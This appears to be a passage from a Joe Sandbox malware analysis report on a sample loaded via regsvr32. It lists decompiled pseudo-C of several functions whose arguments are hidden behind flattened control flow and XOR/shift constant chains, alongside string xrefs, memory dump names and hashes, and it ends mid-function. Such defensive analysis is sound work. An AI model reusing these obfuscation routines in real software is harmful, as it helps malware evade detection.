Uniqueness Score: -1.00%

Function 003DA9EE Relevance: 7.8, Strings: 6, Instructions: 253
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E003DA9EE() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t283;
				short _t290;
				signed int _t293;
				void* _t305;
				signed int _t306;
				signed int _t309;
				signed int _t312;
				signed int _t314;
				signed int _t316;
				intOrPtr _t332;
				void* _t333;
				void* _t334;
				short* _t335;
				short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t341;

				_t341 =  &_v24;
				_t332 =  *0x3e2208; // 0x28e510
				_t305 = 0xed20;
				_v4 = 0x716ce;
				_t333 = _t332 + 0x22c;
				do {
					while(_t305 != 0xed20) {
						if(_t305 == 0x72230) {
							_v20 = 0x49ed9d;
							_v20 = _v20 + 0xaa5a;
							_v20 = _v20 ^ 0x997b34c3;
							_v20 = _v20 >> 0xb;
							_v20 = _v20 ^ 0x00132630;
							_v12 = 0xd83b0a;
							_t306 = 0x2a;
							_push(_t306);
							_v12 = _v12 / _t306;
							_v12 = _v12 ^ 0x000525ea;
							_v8 = 0xf3fd08;
							_v8 = _v8 * 0x61;
							_v8 = _v8 ^ 0x5c733e82;
							_v16 = 0x9d6e2c;
							_v16 = _v16 ^ 0x332b9dec;
							_v16 = _v16 | 0xfcd5b913;
							_v16 = _v16 ^ 0x11183d7d;
							_v16 = _v16 ^ 0xeee6d0dc;
							_t283 = E003C2B6C(_v20, _v12);
							_v24 = 0x7b7958;
							_t337 = _t283;
							_v24 = _v24 >> 4;
							_v24 = _v24 >> 3;
							_v24 = _v24 ^ 0x0000f6f3;
							_v4 = 0xa6638d;
							_v4 = _v4 ^ 0x49f1d953;
							_v4 = _v4 ^ 0x49554fc3;
							_v12 = 0x71b02a;
							_v12 = _v12 + 0xffff9ecf;
							_v12 = _v12 >> 1;
							_v12 = _v12 ^ 0x003bd85f;
							_v16 = 0xaf6f38;
							_v16 = _v16 << 0xc;
							_v16 = _v16 | 0xebed637f;
							_v16 = _v16 ^ 0xfff84a34;
							_v20 = 0x43782c;
							_v20 = _v20 | 0x2cb10153;
							_v20 = _v20 >> 0xf;
							_v20 = _v20 ^ 0x0008bdea;
							_v8 = 0xc1ddaa;
							_v8 = _v8 << 4;
							_v8 = _v8 + 0x8705;
							_v8 = _v8 ^ 0x0c1e61a7;
							E003CAF67(_v4, _v8, _t333, _v12, _v24, _v16, _v20);
							_v20 = 0x4aa6a9;
							_v20 = _v20 << 4;
							_t334 = _t333 + 2;
							_v20 = _v20 | 0x15d96344;
							_v20 = _v20 << 9;
							_v20 = _v20 ^ 0xf6d247dd;
							_v16 = 0x43045a;
							_t309 = 0x5a;
							_v16 = _v16 / _t309;
							_v16 = _v16 * 0x31;
							_v16 = _v16 << 9;
							_v16 = _v16 ^ 0x48f10327;
							_v8 = 0x16b3b0;
							_v8 = _v8 >> 4;
							_v8 = _v8 + 0xffff777b;
							_v8 = _v8 ^ 0x0005c592;
							_v4 = 0x593e71;
							_v4 = _v4 << 7;
							_v4 = _v4 ^ 0x2c959f3d;
							_v12 = 0xdd894a;
							_v12 = _v12 * 0x2d;
							_v12 = _v12 ^ 0x26f12203;
							E003CAF67(_v20, _v12, _t334, _v16, _t337, _v8, _v4);
							_t341 =  &(_t341[0xc]);
							_t335 = _t334 + _t337 * 2;
							_t305 = 0xbac79;
							_t290 = 0x5c;
							 *_t335 = _t290;
							_t333 = _t335 + 2;
							continue;
						}
						if(_t305 == 0xbac79) {
							_v12 = 0x322708;
							_v12 = _v12 | 0xea246f6e;
							_v12 = _v12 ^ 0xea366f6a;
							_v24 = 0xf6be82;
							_v24 = _v24 << 0xb;
							_v24 = _v24 | 0x4e78dac9;
							_v24 = _v24 >> 0xa;
							_v24 = _v24 ^ 0x003fff26;
							_v8 = 0x8b217d;
							_v8 = _v8 ^ 0x2bc192aa;
							_v8 = _v8 ^ 0x2b41919a;
							_v16 = 0xe6e71c;
							_v16 = _v16 | 0x72815c13;
							_v16 = _v16 + 0xffff5ea4;
							_v16 = _v16 ^ 0x72e9511d;
							_push(_t305);
							_t293 = E003C2B6C(_v12, _v24);
							_v16 = 0x2dcc19;
							_t338 = _t293;
							_t312 = 0x62;
							_v16 = _v16 / _t312;
							_v16 = _v16 * 0x5f;
							_v16 = _v16 << 8;
							_v16 = _v16 ^ 0x2c64fcda;
							_v24 = 0x6431f0;
							_t314 = 0x7c;
							_v24 = _v24 / _t314;
							_v24 = _v24 ^ 0x563fb9a2;
							_v24 = _v24 + 0x61c1;
							_v24 = _v24 ^ 0x563c8218;
							_v12 = 0x3ce5e;
							_v12 = _v12 ^ 0xed9b94ce;
							_v12 = _v12 ^ 0xed9df06b;
							_v8 = 0xd453c0;
							_v8 = _v8 << 7;
							_v8 = _v8 ^ 0x6a2d5b06;
							_v20 = 0x8d1306;
							_v20 = _v20 ^ 0x7f03f4a5;
							_v20 = _v20 ^ 0x710e957b;
							_v20 = _v20 >> 6;
							_v20 = _v20 ^ 0x003a01ca;
							E003CAF67(_v16, _v20, _t333, _v24, _t338, _v12, _v8);
							_t341 =  &(_t341[7]);
							_t336 = _t333 + _t338 * 2;
							_t305 = 0xd9f50;
							_t290 = 0x2e;
							 *_t336 = _t290;
							_t333 = _t336 + 2;
							continue;
						}
						if(_t305 != 0xd9f50) {
							goto L10;
						}
						_v8 = 0x4c6f0a;
						_v8 = _v8 + 0xffff0bd1;
						_v8 = _v8 + 0xe3fd;
						_v8 = _v8 ^ 0x004c5edb;
						_t339 = _v8;
						_v20 = 0xd1a018;
						_v20 = _v20 + 0x6f75;
						_v20 = _v20 ^ 0x00d17524;
						_v12 = 0x6f4901;
						_t316 = 0x4a;
						_v12 = _v12 / _t316;
						_v12 = _v12 ^ 0x000a4fd6;
						_v4 = 0x9dc12b;
						_v4 = _v4 + 0xae3d;
						_v4 = _v4 ^ 0x00975b24;
						_v8 = 0x91a3e4;
						_v8 = _v8 >> 2;
						_v8 = _v8 >> 9;
						_v8 = _v8 ^ 0x00006adb;
						_v16 = 0xf7540c;
						_v16 = _v16 * 0x77;
						_v16 = _v16 << 8;
						_v16 = _v16 << 2;
						_v16 = _v16 ^ 0xe0465001;
						E003CAF67(_v20, _v16, _t333, _v12, _t339, _v4, _v8);
						 *((short*)(_t333 + _t339 * 2)) = 0;
						return 0;
					}
					_v8 = 0xf40bbf;
					_v8 = _v8 * 0x2d;
					_v8 = _v8 ^ 0x2ae36081;
					_v4 = 0x7d371;
					_v4 = _v4 + 0xffff63a5;
					_v4 = _v4 ^ 0x000cd78a;
					E003C48C6();
					_t305 = 0x72230;
					L10:
				} while (_t305 != 0xbe60d);
				return _t290;
			}

0x003da9ee
0x003da9f5
0x003daa00
0x003daa02
0x003daa0a
0x003daa15
0x003daa15
0x003daa1f
0x003dac85
0x003dac8f
0x003dac97
0x003dac9f
0x003daca4
0x003dacac
0x003dacba
0x003dacbd
0x003dacbe
0x003dacc2
0x003dacca
0x003dacd7
0x003dacdb
0x003dace3
0x003daceb
0x003dacf3
0x003dacfb
0x003dad03
0x003dad1b
0x003dad20
0x003dad28
0x003dad2a
0x003dad2f
0x003dad34
0x003dad3c
0x003dad44
0x003dad4c
0x003dad54
0x003dad5c
0x003dad64
0x003dad68
0x003dad70
0x003dad78
0x003dad7d
0x003dad85
0x003dad8d
0x003dad95
0x003dad9d
0x003dada2
0x003dadaa
0x003dadb2
0x003dadb7
0x003dadbf
0x003dade0
0x003dade5
0x003dadef
0x003dadf4
0x003dadf7
0x003dadff
0x003dae04
0x003dae0c
0x003dae1a
0x003dae1d
0x003dae26
0x003dae2a
0x003dae2f
0x003dae37
0x003dae3f
0x003dae44
0x003dae4c
0x003dae54
0x003dae5c
0x003dae61
0x003dae69
0x003dae76
0x003dae7a
0x003dae98
0x003dae9d
0x003daea0
0x003daea3
0x003daeaa
0x003daeab
0x003daeae
0x00000000
0x003daeae
0x003daa2b
0x003dab19
0x003dab21
0x003dab29
0x003dab31
0x003dab39
0x003dab3e
0x003dab46
0x003dab4b
0x003dab53
0x003dab5b
0x003dab63
0x003dab6b
0x003dab73
0x003dab7b
0x003dab83
0x003dab93
0x003dab9c
0x003daba1
0x003daba9
0x003dabb3
0x003dabb8
0x003dabc3
0x003dabc7
0x003dabcc
0x003dabd4
0x003dabe0
0x003dabe3
0x003dabe7
0x003dabef
0x003dabf7
0x003dabff
0x003dac07
0x003dac0f
0x003dac17
0x003dac1f
0x003dac24
0x003dac2c
0x003dac34
0x003dac3c
0x003dac44
0x003dac49
0x003dac67
0x003dac6c
0x003dac6f
0x003dac72
0x003dac79
0x003dac7a
0x003dac7d
0x00000000
0x003dac7d
0x003daa37
0x00000000
0x00000000
0x003daa3d
0x003daa47
0x003daa4f
0x003daa57
0x003daa5f
0x003daa63
0x003daa6b
0x003daa73
0x003daa7b
0x003daa89
0x003daa8c
0x003daa90
0x003daa98
0x003daaa0
0x003daaa8
0x003daab0
0x003daab8
0x003daabd
0x003daac2
0x003daaca
0x003daad7
0x003daadb
0x003daae0
0x003daae5
0x003dab03
0x003dab0d
0x00000000
0x003dab0d
0x003daeb6
0x003daec3
0x003daec7
0x003daecf
0x003daed7
0x003daedf
0x003daeef
0x003daef4
0x003daef6
0x003daef6
0x00000000

Strings

,xC, xrefs: 003DAD8D
q>Y, xrefs: 003DAE54
jo6, xrefs: 003DAB29
uo, xrefs: 003DAA6B
oL, xrefs: 003DAA3D
Xy{, xrefs: 003DAD20

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: oL$,xC$Xy{$jo6$q>Y$uo
API String ID: 0-106407350
Opcode ID: 08f67d170ad07f8623146890d3e9048fa54d3f6088628918ec38a459441111f5
Instruction ID: 3f6693b2e1cdf5f0936021af6826e4a2983675609701b8611a1053601674fc4a
Opcode Fuzzy Hash: 08f67d170ad07f8623146890d3e9048fa54d3f6088628918ec38a459441111f5
Instruction Fuzzy Hash: 08D1F0715083429FC349CF21D58A40FBBE1BBD8758F508A0DF19AA6260C3B9DA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003D8EF4 Relevance: 7.7, Strings: 6, Instructions: 180
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003D8EF4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				void* _t163;
				void* _t165;
				void* _t182;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				void* _t215;
				void* _t216;
				signed int* _t219;

				_push(_a16);
				_t215 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t163);
				_t219 =  &(( &_v36)[6]);
				_v12 = 0xb1aca;
				_v8 = 0x3b439;
				_t165 = 0x7e8a3;
				_t216 = 0;
				do {
					while(_t165 != 0x36337) {
						if(_t165 == 0x7e8a3) {
							_t165 = 0xc6973;
							continue;
						} else {
							if(_t165 == 0xc6973) {
								_v24 = 0x3e2e5e;
								_t72 =  &_v24; // 0x3e2e5e
								_t195 = 0x2f;
								_v24 =  *_t72 / _t195;
								_v24 = _v24 + 0xffff1917;
								_v24 = _v24 ^ 0x00006bc6;
								_v12 = 0xc7ca08;
								_v12 = _v12 + 0x1d3;
								_v12 = _v12 ^ 0x40c7cbdb;
								_v20 = 0xcab600;
								_v20 = _v20 << 0x10;
								_v20 = _v20 << 0xf;
								_v20 = _v20 ^ 0x00091b22;
								_v32 = 0x4bbc38;
								_v32 = _v32 ^ 0xaabc67bd;
								_v32 = _v32 + 0xffffd88a;
								_v32 = _v32 ^ 0x5151fbc9;
								_v32 = _v32 ^ 0xfba51877;
								_v16 = 0x53ddf4;
								_v16 = _v16 ^ 0xecf63e44;
								_v16 = _v16 ^ 0xecaea0d7;
								_v36 = 0x7d2d7f;
								_v36 = _v36 << 0xa;
								_t196 = 0x61;
								_v36 = _v36 / _t196;
								_v36 = _v36 + 0x546;
								_v36 = _v36 ^ 0x028efde9;
								_v28 = 0x467fd5;
								_v28 = _v28 >> 0xc;
								_v28 = _v28 + 0xffff7f40;
								_v28 = _v28 ^ 0xfff5d572;
								_t182 = E003D6A13( &_v4, _v20, _v12 | _v24, _v32, 0, _a12, _v16, _v36, _v28, _t215);
								_t219 =  &(_t219[8]);
								__eflags = _t182;
								if(__eflags != 0) {
									_t165 = 0x36337;
									continue;
								}
							} else {
								if(_t165 != 0xf87b3) {
									goto L13;
								} else {
									_v24 = 0xc632aa;
									_v24 = _v24 >> 0xe;
									_t198 = 0x13;
									_v24 = _v24 / _t198;
									_v24 = _v24 ^ 0x00000028;
									_v36 = 0xb0e3e2;
									_v36 = _v36 >> 8;
									_v36 = _v36 ^ 0xe91b6664;
									_v36 = _v36 >> 0xa;
									_v36 = _v36 ^ 0x403a46f5;
									_v28 = 0x3ca1ba;
									_v28 = _v28 | 0xfada986b;
									_v28 = _v28 ^ 0xfaf36017;
									_v16 = 0xadd348;
									_v16 = _v16 << 4;
									_v16 = _v16 ^ 0x0ad34397;
									_v32 = 0x3fe1ea;
									_v32 = _v32 + 0xffff5561;
									_v32 = _v32 << 0xe;
									_v32 = _v32 << 1;
									_v32 = _v32 ^ 0x9bac9bb0;
									_v20 = 0xffead9;
									_v20 = _v20 ^ 0x920c7fd1;
									_t199 = 0x30;
									_v20 = _v20 / _t199;
									_v20 = _v20 ^ 0x0308568e;
									_v12 = 0xe4031c;
									_v12 = _v12 + 0xffff7cac;
									_v12 = _v12 ^ 0x00e8460a;
									_t63 =  &_v12; // 0xe8460a
									_t68 =  &_v36; // 0xe8460a
									E003D6A13( &_v4, _v28,  *_t68 | _v24, _v16, _t216, _a12, _v32, _v20,  *_t63, _t215);
								}
							}
						}
						L6:
						return _t216;
					}
					_v16 = 0x8c5a;
					_t192 = 0x51;
					_push(_t192);
					_push(_t192);
					_v16 = _v16 * 0x50;
					_v16 = _v16 ^ 0x00243f08;
					_v20 = 0x3f5139;
					_v20 = _v20 | 0x008ff98a;
					_v20 = _v20 / _t192;
					_v20 = _v20 ^ 0x00032ba1;
					_v12 = 0x4dee33;
					_t154 =  &_v12; // 0x4dee33
					_v12 =  *_t154 * 0x3f;
					_v12 = _v12 ^ 0x13298a15;
					_t216 = E003C8D52(_t192, _v4 + _v4, __eflags);
					__eflags = _t216;
					if(__eflags == 0) {
						_t165 = 0xa7f4f;
						goto L13;
					} else {
						_t165 = 0xf87b3;
						continue;
					}
					goto L6;
					L13:
					__eflags = _t165 - 0xa7f4f;
				} while (__eflags != 0);
				goto L6;
			}

0x003d8efb
0x003d8eff
0x003d8f01
0x003d8f05
0x003d8f09
0x003d8f0d
0x003d8f0e
0x003d8f0f
0x003d8f14
0x003d8f17
0x003d8f1f
0x003d8f27
0x003d8f2c
0x003d8f38
0x003d8f38
0x003d8f45
0x003d9188
0x00000000
0x003d8f4b
0x003d8f4d
0x003d9067
0x003d9071
0x003d9077
0x003d907c
0x003d9082
0x003d908a
0x003d9092
0x003d909a
0x003d90a2
0x003d90aa
0x003d90b2
0x003d90b7
0x003d90bc
0x003d90c4
0x003d90cc
0x003d90d4
0x003d90dc
0x003d90e4
0x003d90ec
0x003d90f4
0x003d90fc
0x003d9104
0x003d910c
0x003d9115
0x003d9119
0x003d9121
0x003d9129
0x003d9131
0x003d9139
0x003d913e
0x003d9146
0x003d9171
0x003d9176
0x003d9179
0x003d917b
0x003d9181
0x00000000
0x003d9181
0x003d8f53
0x003d8f58
0x00000000
0x003d8f5e
0x003d8f5e
0x003d8f68
0x003d8f73
0x003d8f78
0x003d8f7e
0x003d8f83
0x003d8f8b
0x003d8f90
0x003d8f98
0x003d8f9d
0x003d8fa5
0x003d8fad
0x003d8fb5
0x003d8fbd
0x003d8fc5
0x003d8fca
0x003d8fd2
0x003d8fda
0x003d8fe2
0x003d8fe7
0x003d8feb
0x003d8ff3
0x003d8ffb
0x003d9007
0x003d900b
0x003d9013
0x003d901b
0x003d9023
0x003d902b
0x003d9033
0x003d9048
0x003d9055
0x003d905a
0x003d8f58
0x003d8f4d
0x003d905e
0x003d9066
0x003d9066
0x003d918f
0x003d91a0
0x003d91a1
0x003d91a2
0x003d91a3
0x003d91a7
0x003d91af
0x003d91b7
0x003d91c5
0x003d91c9
0x003d91d1
0x003d91d9
0x003d91de
0x003d91e2
0x003d9202
0x003d9206
0x003d9208
0x003d9214
0x00000000
0x003d920a
0x003d920a
0x00000000
0x003d920a
0x00000000
0x003d9219
0x003d9219
0x003d9219
0x00000000

Strings

9Q?, xrefs: 003D91AF
F, xrefs: 003D9033
(, xrefs: 003D8F7E
?, xrefs: 003D8FD2
^.>, xrefs: 003D9071
3MQ, xrefs: 003D91D9

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: F$($3MQ$9Q?$^.>$?
API String ID: 0-1962293216
Opcode ID: 19e6326046c2a9ca5e91bfce0b3358c268c46505143cbcc2369b85221ebdc7a8
Instruction ID: 3e64c75bf44a870ac9aa211e0811dd267a41bd583687c1c4d60af2f93bb5b595
Opcode Fuzzy Hash: 19e6326046c2a9ca5e91bfce0b3358c268c46505143cbcc2369b85221ebdc7a8
Instruction Fuzzy Hash: E98142721093019FC355CF61D88981BBBE1FBC8758F108A1EF189A6260D7B4DA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 1001741F Relevance: 7.7, APIs: 5, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1001741F() {
				signed short _t41;
				intOrPtr _t42;
				signed int _t43;
				intOrPtr _t51;
				intOrPtr* _t54;
				void* _t57;
				void* _t59;

				E1001A9E0(0x10077d68, _t57);
				_t54 =  *((intOrPtr*)(_t57 + 0xc));
				 *((intOrPtr*)(_t57 - 0x10)) = _t59 - 0x24;
				if( *_t54 != 0) {
					__imp__#9(_t54);
				}
				_t51 =  *((intOrPtr*)(_t57 + 8));
				E100166E8(_t51, _t54);
				_t41 =  *_t54;
				if((_t41 & 0x00000060) != 0) {
					L16:
					_t42 = _t51;
					goto L17;
				} else {
					_t43 = _t41 & 0x0000ffff;
					if(_t43 > 0x11) {
						goto L16;
					}
					switch( *((intOrPtr*)(_t43 * 4 +  &M10017608))) {
						case 0:
							goto L16;
						case 1:
							_t42 = E100166E8(_t51, _t54 + 8);
							goto L17;
						case 2:
							__esi = __esi + 8;
							goto L8;
						case 3:
							__esi = __esi + 8;
							__ecx = __edi;
							__eax = E100186A0(__edi, __esi);
							goto L17;
						case 4:
							__esi = __esi + 8;
							__ecx = __edi;
							__eax = E100186FC(__edi, __esi);
							goto L17;
						case 5:
							__eax = __esi + 8;
							__ecx = __edi;
							__eax = E1001671B(__edi, __esi + 8);
							__esi = __esi + 0xc;
							L8:
							__ecx = __edi;
							__eax = E1001875E(__edi, __esi);
							goto L17;
						case 6:
							__eax = __ebp + 8;
							__ecx = __edi;
							__eax = E1001671B(__ecx, __ebp + 8);
							if( *((intOrPtr*)(__ebp + 8)) <= __ebx) {
								 *((intOrPtr*)(__esi + 8)) = __ebx;
							} else {
								_push( *((intOrPtr*)(__ebp + 8)));
								_push(__ebx);
								__imp__#150();
								 *((intOrPtr*)(__esi + 8)) = __eax;
								if(__eax == __ebx) {
									__eax = E1003743B(__ecx);
								}
								__ecx = __edi;
								__eax = L10050710(__edi,  *((intOrPtr*)(__esi + 8)),  *((intOrPtr*)(__ebp + 8)));
							}
							goto L16;
						case 7:
							__ecx = __ebp - 0x1c;
							 *((intOrPtr*)(__ebp - 0x14)) = __ebx;
							E1003B524(__ebp - 0x1c, __edi) = __ebp - 0x2c;
							__ecx = __edi;
							E1001671B(__edi, __ebp - 0x2c) = __ebp - 0x28;
							__ecx = __edi;
							E100166E8(__edi, __ebp - 0x28) = __ebp - 0x26;
							__ecx = __edi;
							E100166E8(__edi, __ebp - 0x26) = __ebp - 0x24;
							__ecx = __edi;
							__eax = L10050710(__edi, __ebp - 0x24, 8);
							__eax = 0x10081380;
							if( *__esi != 0xd) {
								__eax = 0x10081330;
							}
							__edi = __esi + 8;
							_push(__edi);
							_push(__eax);
							_push(0x17);
							__eax = __ebp - 0x2c;
							_push(__ebx);
							__ebx = __imp__CoCreateInstance;
							_push(__ebp - 0x2c);
							__eax =  *__ebx();
							if(__ebp - 0x2c == 0x80070057) {
								__eax = 0x10081380;
								if( *__esi != 0xd) {
									__eax = 0x10081330;
								}
								_push(__edi);
								_push(__eax);
								_push(7);
								__eax = __ebp - 0x2c;
								_push(0);
								_push(__ebp - 0x2c);
								__eax =  *__ebx();
							}
							__eax = E1001689B(__ebp, __eax);
							__eax =  *__edi;
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx =  *__eax;
							_push(__ebp - 0x14);
							_push(0x100826b8);
							_push(__eax);
							if(__eax < 0) {
								__edi =  *__edi;
								__ecx = __ebp - 0x14;
								_push(__ebp - 0x14);
								_push(0x10082240);
								__eax =  *__edi;
								_push(__edi);
								__eax =  *( *__edi)();
							}
							__eax = E1001689B(__ebp, __eax);
							__eax =  *((intOrPtr*)(__ebp - 0x14));
							_push(__ebp - 0x1c);
							_push(__eax);
							__ecx =  *__eax;
							__eax = E1001689B(__ebp, __eax);
							__eax =  *((intOrPtr*)(__ebp - 0x14));
							 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
							_push(__eax);
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)(__ebp + 8));
							goto L17;
						case 8:
							__esi = __esi + 8;
							__ecx = __edi;
							__eax = E100166B9(__edi, __esi);
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t57 - 0xc));
							return _t42;
					}
				}
			}

0x10017424
0x1001742e
0x10017437
0x1001743a
0x1001743d
0x1001743d
0x10017443
0x10017449
0x1001744e
0x10017454
0x100174f1
0x100174f1
0x00000000
0x1001745a
0x1001745a
0x10017460
0x00000000
0x00000000
0x10017466
0x00000000
0x00000000
0x00000000
0x10017473
0x00000000
0x00000000
0x10017487
0x00000000
0x00000000
0x100174a4
0x100174a7
0x100174aa
0x00000000
0x00000000
0x100174b1
0x100174b4
0x100174b7
0x00000000
0x00000000
0x10017494
0x10017497
0x1001749a
0x1001749f
0x1001748a
0x1001748b
0x1001748d
0x00000000
0x00000000
0x100174be
0x100174c1
0x100174c4
0x100174cc
0x10017504
0x100174ce
0x100174ce
0x100174d1
0x100174d2
0x100174da
0x100174dd
0x100174df
0x100174df
0x100174e7
0x100174ec
0x100174ec
0x00000000
0x00000000
0x1001750a
0x1001750d
0x10017515
0x10017518
0x10017520
0x10017523
0x1001752b
0x1001752e
0x10017536
0x1001753c
0x1001753e
0x10017547
0x1001754c
0x1001754e
0x1001754e
0x10017553
0x10017556
0x10017557
0x10017558
0x1001755a
0x1001755d
0x1001755e
0x10017564
0x10017565
0x1001756c
0x10017572
0x10017577
0x10017579
0x10017579
0x1001757e
0x1001757f
0x10017580
0x10017582
0x10017585
0x10017587
0x10017588
0x10017588
0x1001758b
0x10017590
0x10017592
0x10017599
0x1001759b
0x1001759c
0x100175a1
0x100175a6
0x100175a8
0x100175aa
0x100175ad
0x100175ae
0x100175b3
0x100175b5
0x100175b6
0x100175b6
0x100175b9
0x100175be
0x100175c4
0x100175c5
0x100175c6
0x100175cc
0x100175d1
0x100175d4
0x100175d8
0x100175d9
0x100175de
0x00000000
0x00000000
0x1001747a
0x1001747d
0x10017480
0x100174f3
0x100174f8
0x10017501
0x00000000
0x10017466

APIs

__EH_prolog.LIBCMT ref: 10017424
VariantClear.OLEAUT32(?), ref: 1001743D

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ClearH_prologVariant
String ID:
API String ID: 1166855276-0
Opcode ID: 0183a98d8522f69bdcbc59fac6539d10de550cf574365ac4be85fde3c088f6b2
Instruction ID: 243b22f0d8a6c413fc2d1e25b3fce2b50e200bd65fbd415b4e00f38fe58c0ec1
Opcode Fuzzy Hash: 0183a98d8522f69bdcbc59fac6539d10de550cf574365ac4be85fde3c088f6b2
Instruction Fuzzy Hash: E9515475E00215ABCB14DFA4CC85DAE7BBAFF89340B50441AF849EB251DB74EE81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D4930 Relevance: 6.6, Strings: 5, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003D4930(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t328;
				void* _t330;
				signed int _t336;
				signed int _t382;
				signed int _t385;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t396;
				signed int _t399;
				signed int* _t434;
				signed int* _t436;
				void* _t438;

				_t436 =  &_v80;
				_t433 = _a8;
				_t434 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t328);
				_v64 = 0x75b7c;
				_t330 = 0xeb086;
				_v60 = 0xfddae;
				_v56 = 0xa4126;
				while(1) {
					L1:
					_t436 =  &(_t436[4]);
					do {
						while(1) {
							L2:
							_t438 = _t330 - 0xb7f71;
							if(_t438 > 0) {
								break;
							}
							if(_t438 == 0) {
								_v80 = 0x3bedb2;
								_t387 = 0x68;
								_v80 = _v80 / _t387;
								_v80 = _v80 ^ 0x000be4e6;
								_v72 = 0x15c9f8;
								_t388 = 0x1d;
								_v72 = _v72 / _t388;
								_v72 = _v72 ^ 0xb9986541;
								_v72 = _v72 ^ 0xb99127fc;
								_v68 = 0x5a01b0;
								_v68 = _v68 + 0xffff4c0a;
								_t389 = 0x1a;
								_v68 = _v68 / _t389;
								_v68 = _v68 ^ 0x00093f3b;
								_v76 = 0xdc1d30;
								_v76 = _v76 ^ 0x709bca82;
								_v76 = _v76 ^ 0x704ea3cc;
								E003C2DB8( *((intOrPtr*)(_t433 + 0x24)), _v80, _v72, _v68, _v76,  &_v52);
								_t330 = 0x6253b;
								while(1) {
									L1:
									_t436 =  &(_t436[4]);
									goto L2;
								}
							} else {
								if(_t330 == 0x33d23) {
									_v76 = 0x802a6e;
									_t391 = 0x2f;
									_v76 = _v76 / _t391;
									_v76 = _v76 ^ 0x72a13022;
									_v76 = _v76 >> 0xd;
									_v76 = _v76 ^ 0x00049478;
									_v80 = 0x875fa3;
									_v80 = _v80 + 0x29b7;
									_v80 = _v80 | 0x015afdc5;
									_v80 = _v80 + 0xf20c;
									_v80 = _v80 ^ 0x01e4e5de;
